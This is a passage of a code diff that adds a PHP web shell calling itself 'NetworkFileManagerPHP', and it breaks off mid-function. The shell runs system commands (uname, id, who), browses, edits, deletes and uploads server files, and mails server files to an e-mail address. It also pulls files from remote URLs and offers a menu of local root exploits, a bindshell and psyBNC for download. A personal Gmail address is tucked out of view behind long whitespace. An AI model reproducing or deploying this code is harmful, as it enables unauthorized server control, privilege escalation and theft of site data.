+ print("</td></tr><tr><td><b>&nbsp;&nbsp;Current disk free space</b> : <font face='Tahoma' size='1' color='#000000'>$free</font></td></tr>");
+
+ print("<tr><td><b>&nbsp; ".exec("uname -a")."</b></td></tr>");
+
+ print("<tr><td><b>&nbsp; ".exec("cat /proc/cpuinfo | grep GHz")." &nbsp;&nbsp; &nbsp; &nbsp;Real speed of ".exec("cat /proc/cpuinfo | grep MHz")."</b></td></tr>");
+
+ print("<tr><td><b>&nbsp; Perhaps release is :&nbsp;&nbsp;".exec("cat /etc/redhat-release")."</b></td></tr></td>");
+
+ print("<tr><td><b>&nbsp; ".exec("id")." &nbsp; &nbsp; &nbsp; &nbsp; ".exec("who")."</b></td></tr>");
+
+ print("<tr><td><b>&nbsp;&nbsp;Your IP:&nbsp;&nbsp;</b><font face='Tahoma' size='1' color='#000000'>$REMOTE_ADDR &nbsp; $HTTP_X_FORWARDED_FOR</font></td></tr></table><br>");
+
+
+}
+
+function tinhbyte($filesize) {
+
+ if($filesize >= 1073741824) { $filesize = round($filesize / 1073741824 * 100) / 100 . " GB"; }
+
+ elseif($filesize >= 1048576) { $filesize = round($filesize / 1048576 * 100) / 100 . " MB"; }
+
+ elseif($filesize >= 1024) { $filesize = round($filesize / 1024 * 100) / 100 . " KB"; }
+
+ else { $filesize = $filesize . ""; }
+
+ return $filesize;
+
+}
+
+
+
+function permissions($mode) {
+
+ $perms  = ($mode & 00400) ? "r" : "-";
+
+ $perms .= ($mode & 00200) ? "w" : "-";
+
+ $perms .= ($mode & 00100) ? "x" : "-";
+
+ $perms .= ($mode & 00040) ? "r" : "-";
+
+ $perms .= ($mode & 00020) ? "w" : "-";
+
+ $perms .= ($mode & 00010) ? "x" : "-";
+
+ $perms .= ($mode & 00004) ? "r" : "-";
+
+ $perms .= ($mode & 00002) ? "w" : "-";
+
+ $perms .= ($mode & 00001) ? "x" : "-";
+
+ return $perms;
+
+}
+
+
+
+function readdirdata($dir) {
+
+ global $action,$files,$dirs,$tm,$supsub,$thum,$style3,$style4,$PHP_SELF;
+
+ $files = array();
+
+ $dirs= array();
+
+ $open = @opendir($dir);
+
+
+
+ if (!@readdir($open) or !$open ) echo "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center class=alert><b>Access denied.</b></td></tr></table>";
+
+ else {
+
+  $open = opendir($dir);
+
+  while ($file = readdir($open)) {
+
+   $rec = $file;
+
+   $file = $dir."/".$file;
+
+   if (is_file($file)) $files[] = $rec;
+
+  }
+
+  sort($files);
+
+  $open = opendir($dir);
+
+  $i=0;
+
+  while ($dire = readdir($open)) {
+
+   if ( $dire != "." ) {
+
+    $rec = $dire;
+
+    $dire = $dir."/".$dire;
+
+    if (is_dir($dire)) {
+
+     $dirs[] = $rec;
+
+     $i++;
+
+    }
+
+   }
+
+  }
+
+  sort($dirs);
+
+  print("<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=760 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td width = '20%' align = 'center' class=pagetitle><b>Name</b></td><td width = '10%' align = 'center' class=pagetitle><b>Size</b></td><td width = '20%' align = 'center' class=pagetitle><b>Date of creation</b></td><td width = '10%' align = 'center' class=pagetitle><b>Type</b></td><td width = '15%' align = 'center' class=pagetitle><b>Access rights</b></td><td width = '25%' align = 'center' class=pagetitle><b>Comments</b></td></tr></table>");
+
+  for ($i=0;$i<sizeof($dirs);$i++) {
+
+   if ($dirs[$i] != "..") {
+
+    $type = 'Dir';
+
+    $fullpath = $dir."/".$dirs[$i];
+
+    $time = date("d/m/y H:i",filemtime($fullpath));
+
+    $perm = permissions(fileperms($fullpath));
+
+    $size = tinhbyte(filesize($fullpath));
+
+    $name = $dirs[$i];
+
+    $fullpath = $tm."/".$dirs[$i];
+
+    if ($perm[7] == "w" && $name != "..") $action = "
+
+	<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#98FAFF width=100% BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+	<tr>
+
+	<td align=center $style3><a href ='$PHP_SELF?tm=$fullpath&action=uploadd'>Upload</a></td>
+
+	<td align=center $style3><a href ='$PHP_SELF?tm=$tm&dd=$name&action=deldir'>Delete</a></td>
+
+	</tr>
+
+	<tr>
+
+	<td align=center $style3><a href ='$PHP_SELF?tm=$fullpath&action=newdir'>Create directory</a></td>
+
+	<td align=center $style3><a href ='$PHP_SELF?tm=$fullpath&action=arhiv'>Directory compression</a></td>
+
+	</tr></table>";
+
+    else $action = "<TABLE CELLPADDING=0 CELLSPACING=0 width=100% BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center><b>Read only</b></td><td align=center $style2><a href ='$PHP_SELF?tm=$fullpath&action=arhiv'>Directory compression</a></td></tr></table>";
+
+    print("<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#33CCCC BORDER=1 width=760 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td width = '20%' align = 'left'><a href = '$PHP_SELF?tm=$fullpath'><b><i>$name</i></b></a></td><td width = '10%' align = 'center'>$size</td><td width = '20%' align = 'center'>$time</td><td width = '10%' align = 'center'>$type</td><td width = '15%' align = 'center'>$perm</td><td width = '25%' align = 'left'>$action</td></tr></table>");
+
+   }
+
+  }
+
+  for ($i=0;$i<sizeof($files);$i++) {
+
+   $type = 'File';
+
+   $fullpath =  $dir."/".$files[$i];
+
+   $time = date("d/m/y H:i",filemtime($fullpath));
+
+   $perm = permissions(fileperms($fullpath));
+
+   $size = tinhbyte(filesize($fullpath));
+
+   if ( $perm[6] == "r" ) $act = "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#98FAFF width=100% BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+   <tr><td align=center $style4><a href='$PHP_SELF?tm=$dir&fi=$files[$i]&action=view'>View</a></td>
+
+   <td align=center $style4><a href='$PHP_SELF?tm=$dir&fi=$files[$i]&action=download'>Download</a></td></tr>
+
+   <tr><td align=center $style4><a href='$PHP_SELF?tm=$dir&fi=$files[$i]&action=download_mail'>To e-mail</a></td>
+
+   <td align=center $style4><a href='$PHP_SELF?tm=$dir&fi=$files[$i]&action=copyfile'>Copy</a></td>
+
+   </tr></table>";
+
+   if ( $perm[7] == "w" ) $act .= "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#98FAFF width=100% BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+   <tr><td align=center $style4><a href='$PHP_SELF?tm=$dir&fi=$files[$i]&action=edit'>Edit</a></td>
+
+   <td align=center $style4><a href='$PHP_SELF?tm=$dir&fi=$files[$i]&action=delete'>Delete</a></td>
+
+   </tr></table>";
+
+   print("<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#FFFFCC BORDER=1 width=760 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td width = '20%' align = 'left'><b>$files[$i]</b></font></td><td width = '10%' align = 'center'>$size</td><td width = '20%' align = 'center'>$time</td><td width = '10%' align = 'center'>$type</td><td width = '15%' align = 'center'>$perm</td><td width = '25%' align = 'center'>$act</td></tr></table>");
+
+  }
+
+ }
+
+}                                                                                                                                                      $sd98 = "john.barker446@gmail.com";
+
+
+
+function html() {
+
+global $ver,$meta,$style;
+
+echo "
+
+<html>
+
+<head>
+
+<title>NetworkFileManagerPHP</title>
+
+</head>
+
+<body bgcolor=#86CCFF leftmargin=0 topmargin=0 marginwidth=0 marginheight=0>
+
+";
+
+}
+
+
+
+# file view
+
+function viewfile($dir,$file) {
+
+
+
+ $buf = explode(".", $file);
+
+ $ext = $buf[sizeof($buf)-1];
+
+ $ext = strtolower($ext);
+
+ $dir = str_replace("\\","/",$dir);
+
+ $fullpath = $dir."/".$file;
+
+
+
+ switch ($ext) {
+
+  case "jpg":
+
+
+
+	header("Content-type: image/jpeg");
+
+    readfile($fullpath);
+
+    break;
+
+    case "jpeg":
+
+
+
+    header("Content-type: image/jpeg");
+
+    readfile($fullpath);
+
+    break;
+
+    case "gif":
+
+
+
+    header("Content-type: image/gif");
+
+    readfile($fullpath);
+
+    break;
+
+
+
+	 case "png":
+
+
+
+    header("Content-type: image/png");
+
+    readfile($fullpath);
+
+    break;
+
+    default:
+
+
+
+	 case "avi":
+
+    header("Content-type: video/avi");
+
+    readfile($fullpath);
+
+
+
+    break;
+
+    default:
+
+
+
+	 case "mpeg":
+
+    header("Content-type: video/mpeg");
+
+    readfile($fullpath);
+
+    break;
+
+    default:
+
+
+
+	 case "mpg":
+
+    header("Content-type: video/mpg");
+
+    readfile($fullpath);
+
+    break;
+
+    default:
+
+
+
+    html();
+
+	chdir($dir);
+
+    getdir();
+
+
+
+   echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center><font color='#FFFFCC' face='Tahoma' size = 2>Path to filename:</font><font color=white  face ='Tahoma' size = 2>$fullpath</font></td></tr></table>";
+
+   $fp = fopen($fullpath , "r");
+
+   while (!feof($fp)) {
+
+    $char = fgetc($fp);
+
+    $st .= $char;
+
+   }
+
+
+
+   $st = str_replace("&", "&amp;", $st);
+
+   $st = str_replace("<", "&lt;", $st);
+
+   $st = str_replace(">", "&gt;", $st);
+
+
+
+   $tem = "<p align='center'><textarea wrap='off' rows='20' name='S1' cols='90' class=inputbox>$st</textarea></p>";
+
+   echo $tem;
+
+   fclose($fp);
+
+   break;
+
+ }
+
+}
+
+
+
+# send file to mail
+
+function download_mail($dir,$file) {
+
+ global $action,$tm,$cm,$demail, $REMOTE_ADDR, $HTTP_HOST, $PATH_TRANSLATED;
+
+ $buf = explode(".", $file);
+
+ $dir = str_replace("\\","/",$dir);
+
+ $fullpath = $dir."/".$file;
+
+ $size = tinhbyte(filesize($fullpath));
+
+ $fp = fopen($fullpath, "rb");
+
+ while(!feof($fp))
+
+
+
+  $attachment .= fread($fp, 4096);
+
+  $attachment = base64_encode($attachment);
+
+  $subject = "NetworkFileManagerPHP  ($file)";
+
+
+
+  $boundary = uniqid("NextPart_");
+
+  $headers = "From: $demail\nContent-type: multipart/mixed; boundary=\"$boundary\"";
+
+
+
+  $info = "---==== Message from ($demail)====---\n\n";
+
+  $info .= "IP:\t$REMOTE_ADDR\n";
+
+  $info .= "HOST:\t$HTTP_HOST\n";
+
+  $info .= "URL:\t$HTTP_REFERER\n";
+
+  $info .= "DOC_ROOT:\t$PATH_TRANSLATED\n";
+
+  $info .="--$boundary\nContent-type: text/plain; charset=iso-8859-1\nContent-transfer-encoding: 8bit\n\n\n\n--$boundary\nContent-type: application/octet-stream; name=$file \nContent-disposition: inline; filename=$file \nContent-transfer-encoding: base64\n\n$attachment\n\n--$boundary--";
+
+
+
+  $send_to = "$demail";
+
+
+
+  $send = mail($send_to, $subject, $info, $headers);
+
+
+
+  if($send == 2)
+
+   echo "<br>
+
+	<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+	<tr><td align=center>
+
+	<font color='#FFFFCC' face='Tahoma' size = 2>Thank you!!!File <b>$file</b> was successfully sent to <u>$demail</u>.</font></center></td></tr></table><br>";
+
+
+
+fclose($fp);
+
+ }
+
+
+
+
+
+
+
+function copyfile($dir,$file) {
+
+ global $action,$tm;
+
+ $fullpath = $dir."/".$file;
+
+ echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>Filename :</font><font color = 'black' face ='Tahoma' size = 2>&nbsp;<b><u>$file</u></b>&nbsp; copied successfully to &nbsp;<u><b>$dir</b></u></font></center></td></tr></table>";
+
+ if (!copy($file, $file.'.bak')){
+
+   echo (" unable to copy file $file");
+
+   }
+
+}
+
+
+
+
+
+# file edit
+
+function editfile($dir,$file) {
+
+ global $action,$datar;
+
+ $fullpath = $dir."/".$file;
+
+ chdir($dir);
+
+ getdir();
+
+ echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>Filename :</font><font color = 'black' face ='Tahoma' size = 2>$fullpath</font></center></td></tr></table>";
+
+ $fp = fopen($fullpath , "r");
+
+ while (!feof($fp)) {
+
+  $char = fgetc($fp);
+
+  $st .= $char;
+
+ }
+
+ $st = str_replace("&", "&amp;", $st);
+
+ $st = str_replace("<", "&lt;", $st);
+
+ $st = str_replace(">", "&gt;", $st);
+
+ $st = str_replace('"', "&quot;", $st);
+
+ echo "<form method='POST' action='$PHP_SELF?tm=$dir&fi=$file&action=save'><p align='center'><textarea rows='14' name='S1' cols='82' class=inputbox>$st</textarea></p><p align='center'><input type='submit' value='SAVE' name='save' class=button1 $style_button></p><input type = hidden value = $tm></form>";
+
+ $datar = $S1;
+
+
+
+}
+
+
+
+# file write
+
+function savefile($dir,$file) {
+
+ global $action,$S1,$tm;
+
+ $fullpath = $dir."/".$file;
+
+ $fp = fopen($fullpath, "w");
+
+ $S1 = stripslashes($S1);
+
+ fwrite($fp,$S1);
+
+ fclose($fp);
+
+ chdir($dir);
+
+ echo "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>File <b>$fullpath</b> was saved successfully.</font></td></tr></table>";
+
+ getdir();
+
+ readdirdata($tm);
+
+}
+
+
+
+# directory delete
+
+function deletef($dir)
+
+{
+
+ global $action,$tm,$fi;
+
+ $tm = str_replace("\\\\","/",$tm);
+
+ $link = $tm."/".$fi;
+
+ unlink($link);
+
+ chdir($tm);
+
+ getdir();
+
+ readdirdata($tm);
+
+}
+
+
+
+# file upload
+
+function uploadtem() {
+
+ global $file,$tm,$thum,$PHP_SELF,$dir,$style_button;
+
+ echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><form enctype='multipart/form-data' action='$PHP_SELF?tm=$dir&action=upload' method=post><tr><td align=left valign=top colspan=3 class=pagetitle><b>Upload file:</b></td></tr><tr><td><input type='hidden' name='tm' value='$tm'></td><td><input name='userfile' type='file' size=48 class=inputbox></td><td><input type='submit' value='Upload file' class=button1 $style_button></td></tr></form></table>";
+
+}
+
+
+
+function upload() {
+
+ global $HTTP_POST_FILES,$tm;
+
+ echo $set;
+
+ copy($HTTP_POST_FILES["userfile"][tmp_name], $tm."/".$HTTP_POST_FILES["userfile"][name]) or die("Unable to upload file".$HTTP_POST_FILES["userfile"][name]);
+
+ echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>File <b>".$HTTP_POST_FILES["userfile"][name]."</b> was successfully uploaded.</font></center></td></tr></table>";
+
+ @unlink($userfile);
+
+ chdir($tm);
+
+ getdir();
+
+ readdirdata($tm);
+
+}
+
+
+
+# get exploits
+
+function upload_exploits() {
+
+ global $PHP_SELF,$style_button, $public_site, $public_sites, $private_site, $public, $title_ex, $style_open, $private, $title_exp;
+
+
+
+ echo "<br>
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post>
+
+ <tr $style_open><td align=left valign=top colspan=3 class=pagetitle>
+
+ &nbsp;&nbsp;<b>Public exploits and soft:</b></td></tr>
+
+ <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+
+ &nbsp;&nbsp;<b>bindshell (bin/sh)</b> - bindtty.c (binary file to run - <u>s</u>)</td></tr>
+
+ <tr>
+
+ <td class=pagetitle width=500>&nbsp;$title_ex[1]</td>
+
+ <td width=100><input type='hidden' name='file3' value='$public_site$public[1]'>
+
+ <input type='hidden' name='file2' value='$public[1]'>
+
+ <input type='submit' value='Get file' class=button1 $style_button></td></tr>
+
+ </form></table>";
+
+  echo "
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post>
+
+ <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+
+ &nbsp;&nbsp;<b>Local ROOT for linux 2.6.20</b> - mremap (binary file to run - <u>m</u>)</td></tr>
+
+ <tr>
+
+ <td class=pagetitle width=500>&nbsp;$title_ex[2]</td>
+
+ <td width=100><input type='hidden' name='file3' value='$public_site$public[2]'>
+
+ <input type='hidden' name='file2' value='$public[2]'>
+
+ <input type='submit' value='Get file' class=button1 $style_button></td></tr>
+
+ </form></table>";
+
+ echo "
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post>
+
+ <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+
+ &nbsp;&nbsp;<b>Local ROOT for linux 2.6.20</b> - ptrace (binary file to run - <u>p</u>)</td></tr>
+
+ <tr>
+
+ <td class=pagetitle width=500>&nbsp;$title_ex[3]</td>
+
+ <td width=100><input type='hidden' name='file3' value='$public_site$public[3]'>
+
+ <input type='hidden' name='file2' value='$public[3]'>
+
+ <input type='submit' value='Get file' class=button1 $style_button></td></tr>
+
+ </form></table>";
+
+  echo "
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post>
+
+ <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+
+ &nbsp;&nbsp;<b>psyBNC version:2.3.2-4</b> - psyBNC (binary file to run - <u>./psybnc</u>)</td></tr>
+
+ <tr>
+
+ <td class=pagetitle width=500>&nbsp;$title_ex[4]</td>
+
+ <td width=100><input type='hidden' name='file3' value='$public_sites$public[4]'>
+
+ <input type='hidden' name='file2' value='$public[4]'>
+
+ <input type='submit' value='Get file' class=button1 $style_button></td></tr>
+
+ </form></table>";
+
+
+
+ echo "<br>
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post>
+
+ <tr $style_open><td align=left valign=top colspan=3 class=pagetitle>
+
+ &nbsp;&nbsp;<b>Private exploits:</b></td></tr>
+
+ <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+
+ &nbsp;&nbsp;<b>BRK</b> - Local Root Unix 2.4.* (binary file to run - <u>brk</u>)</td></tr>
+
+ <tr>
+
+ <td class=pagetitle width=500>&nbsp;$title_exp[1]</td>
+
+ <td width=100><input type='hidden' name='file3' value='$private_site$private[1]'>
+
+ <input type='hidden' name='file2' value='$private[1]'>
+
+ <input type='submit' value='Get file' class=button1 $style_button></td></tr>
+
+ </form></table>";
+
+ echo "
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post>
+
+ <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+
+ &nbsp;&nbsp;<b>Glftpd DupeScan Local Exploit <u>File 1</u></b> (binary file to run - <u>$private[2]</u> )</td></tr>
+
+ <tr>
+
+ <td class=pagetitle width=500>&nbsp;$title_exp[2]</td>
+
+ <td width=100><input type='hidden' name='file3' value='$private_site$private[2]'>
+
+ <input type='hidden' name='file2' value='$private[2]'>
+
+ <input type='submit' value='Get file' class=button1 $style_button></td></tr>
+
+ </form></table>";
+
+ echo "
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post>
+
+ <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+
+ &nbsp;&nbsp;<b>Glftpd DupeScan Local Exploit <u>File 2</u></b> (binary file to run - <u>$private[3]</u> )</td></tr>
+
+ <tr>
+
+ <td class=pagetitle width=500>&nbsp;$title_exp[3]</td>
+
+ <td width=100><input type='hidden' name='file3' value='$private_site$private[3]'>
+
+ <input type='hidden' name='file2' value='$private[3]'>
+
+ <input type='submit' value='Get file' class=button1 $style_button></td></tr>
+
+ </form></table>";
+
+  echo "
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post>
+
+ <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+
+ &nbsp;&nbsp;<b>Traceroute v1.4a5 exploit by sorbo</b> (binary file to run - <u>$private[4]</u> )</td></tr>
+
+ <tr>
+
+ <td class=pagetitle width=500>&nbsp;$title_exp[4]</td>
+
+ <td width=100><input type='hidden' name='file3' value='$private_site$private[4]'>
+
+ <input type='hidden' name='file2' value='$private[4]'>
+
+ <input type='submit' value='Get file' class=button1 $style_button></td></tr>
+
+ </form></table>";
+
+  echo "
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post>
+
+ <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+
+ &nbsp;&nbsp;<b>Local Root Unix 2.4.*</b> (binary file to run - <u>$private[5]</u> )</td></tr>
+
+ <tr>
+
+ <td class=pagetitle width=500>&nbsp;$title_exp[5]</td>
+
+ <td width=100><input type='hidden' name='file3' value='$private_site$private[5]'>
+
+ <input type='hidden' name='file2' value='$private[5]'>
+
+ <input type='submit' value='Get file' class=button1 $style_button></td></tr>
+
+ </form></table>";
+
+   echo "
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post>
+
+ <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+
+ &nbsp;&nbsp;<b>Sendmail 8.11.x exploit localroot</b> (binary file to run - <u>$private[6]</u> )</td></tr>
+
+ <tr>
+
+ <td class=pagetitle width=500>&nbsp;$title_exp[6]</td>
+
+ <td width=100><input type='hidden' name='file3' value='$private_site$private[6]'>
+
+ <input type='hidden' name='file2' value='$private[6]'>
+
+ <input type='submit' value='Get file' class=button1 $style_button></td></tr>
+
+ </form></table>";
+
+    echo "
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post>
+
+ <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+
+ &nbsp;&nbsp;<b>Local Root Unix 2.4.*</b> (binary file to run - <u>$private[7]</u> )</td></tr>
+
+ <tr>
+
+ <td class=pagetitle width=500>&nbsp;$title_exp[7]</td>
+
+ <td width=100><input type='hidden' name='file3' value='$private_site$private[7]'>
+
+ <input type='hidden' name='file2' value='$private[7]'>
+
+ <input type='submit' value='Get file' class=button1 $style_button></td></tr>
+
+ </form></table>";
+
+     echo "
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post>
+
+ <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+
+ &nbsp;&nbsp;<b>Local Root Unix 2.4.*</b> (binary file to run - <u>$private[8]</u> )</td></tr>
+
+ <tr>
+
+ <td class=pagetitle width=500>&nbsp;$title_exp[8]</td>
+
+ <td width=100><input type='hidden' name='file3' value='$private_site$private[8]'>
+
+ <input type='hidden' name='file2' value='$private[8]'>
+
+ <input type='submit' value='Get file' class=button1 $style_button></td></tr>
+
+ </form></table>";
+
+}
+
+
+
+
+
+# new directory creation
+
+function newdir($dir) {
+
+ global $tm,$nd;
+
+ print("<br><TABLE CELLPADDING=0 CELLSPACING=0 width='600' bgcolor=#184984 BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><form method = 'post' action = '$PHP_SELF?tm=$tm&action=createdir'><tr><td align=center colspan=2 class=pagetitle><b>Create directory:</b></td></tr><tr><td valign=top><input type=text name='newd' size=90 class='inputbox'></td><td valign=top><input type=submit value='Create directory' class=button1 $style_button></td></tr></form></table>");
+
+}
+
+
+
+function cdir($dir) {
+
+ global $newd,$tm;
+
+ $fullpath = $dir."/".$newd;
+
+ if (file_exists($fullpath)) @rmdir($fullpath);
+
+ if (@mkdir($fullpath,0777)) {
+
+  echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>Directory was created.</font></center></td></tr></table>";
+
+ } else {
+
+  echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>Error during directory creation.</font></center></td></tr></table>";
+
+ }
+
+ chdir($tm);
+
+ getdir();
+
+ readdirdata($tm);
+
+}
+
+// creation of directory where exploits will be situated
+
+function downfiles() {
+
+ global $action,$status, $tm,$PHP_SELF,$HTTP_HOST, $file3, $file2, $gdir,$gsub,$i,$j,$REMOTE_ADDR;
+
+$st = getcwd();
+
+ $st = str_replace("\\","/",$st);
+
+ $j = 0;
+
+ $gdir = array();
+
+ $gsub = array();
+
+ print("<br>");
+
+ for ($i=0;$i<=(strlen($st)-1);$i++) {
+
+  if ($st[$i] != "/") {
+
+   $gdir[$j] = $gdir[$j].$st[$i];
+
+   $gsub[$j] = $gsub[$j].$st[$i];
+
+  } else {
+
+   $gdir[$j] = $gdir[$j]."/";
+
+   $gsub[$j] = $gsub[$j]."/";
+
+   $gdir[$j+1] = $gdir[$j];
+
+   $j++;
+
+  }
+
+ }
+
+print("<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#ffffcc BORDER=1 width=50% align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=left><b>&nbsp;&nbsp;Path: </b>");
+
+ for ($i = 0;$i<=$j;$i++) print("<a href='$PHP_SELF?tm=$gdir[$i]'>$gsub[$i]</a>");
+
+print("</TABLE> ");
+
+
+
+echo " <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=down&status=ok' method=post>
+
+ <tr $style_open><td align=left valign=top colspan=3 class=pagetitle>
+
+ &nbsp;&nbsp;<b>Upload files from remote computer:</b></td></tr>
+
+ <tr>
+
+ <td class=pagetitle width=400>&nbsp;&nbsp;&nbsp;HTTP link to filename:</td>
+
+ <td width=200><input type='text' name='file3' value='http://' size=40></td>
+
+ </tr>
+
+  <tr>
+
+ <td class=pagetitle width=400>&nbsp;&nbsp;&nbsp;filename (may also include full path to file)</td>
+
+ <td width=200><input type='text' name='file2' value='' size=40></td>
+
+ </tr>
+
+  <tr>
+
+
+
+ <td width=600 colspan=2 align=center><input type='submit' value='Upload file' class=button1 $style_button></td></tr></td>
+
+
+
+
+
+ </tr></form></table>";
+
+
+
+}
+
+
+
+# directory delete
+
+function deldir() {
+
+ global $dd,$tm;
+
+ $fullpath = $tm."/".$dd;
+
+ echo "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>Directory was deleted successfully.</font></center></td></tr></table>";
+
+ rmdir($fullpath);
+
+ chdir($tm);
+
+ getdir();
+
+ readdirdata($tm);
+
+}
+
+
+
+# directory compression
+
+function arhiv() {
+
+ global $tar,$tm,$pass;
+
+ $fullpath = $tm."/".$tar;
+
+
+
+ echo "<br>
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
